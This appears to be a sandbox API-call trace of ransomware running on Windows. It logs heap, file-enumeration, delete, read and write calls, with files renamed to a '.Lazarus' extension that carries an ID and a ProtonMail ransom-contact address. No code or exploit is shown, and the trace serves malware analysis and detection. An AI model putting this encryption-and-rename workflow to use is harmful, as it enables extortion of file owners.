[0071.829] GetLastError () returned 0x0 [0071.829] SetLastError (dwErrCode=0x0) [0071.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0071.829] GetLastError () returned 0x0 [0071.829] SetLastError (dwErrCode=0x0) [0071.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0071.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0071.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0071.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0071.829] CloseHandle (hObject=0x410) returned 1 [0071.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0071.831] CloseHandle (hObject=0x418) returned 1 [0071.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0071.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0071.832] AreFileApisANSI () returned 1 [0071.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0071.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0071.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 45 [0071.832] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0071.833] GetFileType (hFile=0x418) returned 0x1 [0071.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0071.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0071.833] GetLastError () returned 0xb7 [0071.833] SetLastError (dwErrCode=0xb7) [0071.833] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0071.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0071.993] CloseHandle (hObject=0x418) returned 1 [0071.993] AreFileApisANSI () returned 1 [0071.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0071.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0071.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 45 [0071.994] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml")) returned 1 [0071.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0071.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0071.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0071.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d750 | out: hHeap=0x20000) returned 1 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0071.995] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.995] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.995] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0071.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0071.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0071.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0071.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0071.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0071.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0071.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0071.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0071.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0071.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0071.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0071.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0071.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0071.996] AreFileApisANSI () returned 1 [0071.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\2052\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\2052\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0071.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0071.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.996] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0071.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0071.996] AreFileApisANSI () returned 1 [0071.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0071.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0071.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 46 [0071.996] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0071.997] GetFileType (hFile=0x418) returned 0x1 [0071.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0071.997] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0071.997] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0071.997] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0071.997] CloseHandle (hObject=0x418) returned 1 [0071.997] AreFileApisANSI () returned 1 [0071.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0071.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0071.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 46 [0071.998] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0071.998] GetFileType (hFile=0x418) returned 0x1 [0071.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0071.998] CloseHandle (hObject=0x418) returned 1 [0071.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0071.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0071.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0071.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0071.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0071.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0071.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0071.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0071.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0071.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0071.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0071.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0071.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0071.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0071.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0071.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0071.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0071.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0071.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0071.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0071.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0071.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0071.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0071.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0071.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0071.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0071.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0071.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0071.999] AreFileApisANSI () returned 1 [0071.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0071.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0071.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 46 [0071.999] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758)) returned 1 [0071.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.999] AreFileApisANSI () returned 1 [0071.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0071.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0071.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0071.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0071.999] GetLastError () returned 0x0 [0071.999] SetLastError (dwErrCode=0x0) [0071.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df18 [0071.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0071.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bd10 [0071.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0071.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0071.999] GetLastError () returned 0x0 [0071.999] SetLastError (dwErrCode=0x0) [0071.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0071.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0071.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71a30 [0072.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0072.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a8c0 [0072.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0072.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0072.000] AreFileApisANSI () returned 1 [0072.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a8c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0072.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x80a30 [0072.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a8c0, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0072.000] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0072.000] GetFileType (hFile=0x418) returned 0x1 [0072.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0072.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0072.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0072.001] AreFileApisANSI () returned 1 [0072.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0072.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0072.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 46 [0072.001] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.001] GetFileType (hFile=0x410) returned 0x1 [0072.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a5b0 [0072.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0072.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.001] GetLastError () returned 0x0 [0072.001] SetLastError (dwErrCode=0x0) [0072.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0072.001] GetLastError () returned 0x0 [0072.001] SetLastError (dwErrCode=0x0) [0072.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0072.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0072.001] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0072.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0072.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0072.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0072.011] GetLastError () returned 0x0 [0072.011] SetLastError (dwErrCode=0x0) [0072.011] GetLastError () returned 0x0 [0072.011] SetLastError (dwErrCode=0x0) [0072.011] GetLastError () returned 0x0 [0072.011] SetLastError (dwErrCode=0x0) [0072.011] GetLastError () returned 0x0 [0072.011] SetLastError (dwErrCode=0x0) [0072.012] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.012] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.013] GetLastError () returned 0x0 [0072.013] SetLastError (dwErrCode=0x0) [0072.013] GetLastError () returned 0x0 [0072.013] SetLastError (dwErrCode=0x0) [0072.013] GetLastError () returned 0x0 [0072.013] SetLastError (dwErrCode=0x0) [0072.013] GetLastError () returned 0x0 [0072.013] SetLastError (dwErrCode=0x0) [0072.013] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0072.013] WriteFile (in: hFile=0x418, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0072.014] GetLastError () returned 0x0 [0072.014] SetLastError (dwErrCode=0x0) [0072.014] GetLastError () returned 0x0 [0072.014] SetLastError (dwErrCode=0x0) [0072.014] GetLastError () returned 0x0 